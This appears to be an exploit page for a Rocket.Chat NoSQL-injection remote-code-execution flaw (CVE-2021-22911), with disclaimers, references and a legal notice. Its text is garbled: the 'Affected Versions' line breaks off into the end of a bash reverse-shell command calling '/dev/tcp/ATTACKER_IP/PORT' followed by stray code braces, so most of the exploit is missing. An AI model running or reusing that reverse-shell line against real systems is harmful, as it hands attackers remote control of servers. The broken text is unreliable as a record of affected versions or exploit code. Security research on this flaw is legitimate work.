Share
## https://sploitus.com/exploit?id=8B4F5527-C9DE-5BFD-9AB2-EC1B6F7017F7
# Rocket.Chat CVE-2021-22911 Exploit

## โš ๏ธ DISCLAIMER - EDUCATIONAL USE ONLY

This exploit is for **authorized penetration testing and educational purposes only**. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse.

## ๐Ÿ“‹ Overview

**CVE-2021-22911** is a critical unauthenticated NoSQL injection vulnerability in Rocket.Chat that leads to Remote Code Execution (RCE).

- **CVSS Score:** 9.8 (Critical)
- **Affected Versions:** Rocket.Chat & /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}
```

## ๐Ÿ“š References

- Original Exploit: [enox - Exploit-DB 50078, 50108](https://www.exploit-db.com/)
- Vulnerability Analysis: [SonarSource Blog](https://blog.sonarsource.com/nosql-injections-in-rocket-chat)
- CVE Details: [CVE-2021-22911](https://vulners.com/cve/CVE-2021-22911)

## ๐Ÿ“ Credits

- **enox** - Original exploit development
- **SonarSource** - Vulnerability research and analysis

## โš–๏ธ Legal Notice

This tool is provided for educational purposes and authorized security testing only. Unauthorized access to computer systems is a criminal offense under the Computer Fraud and Abuse Act (CFAA) and similar international laws.

---

**Use responsibly. Only test systems you own or have explicit written permission to test.**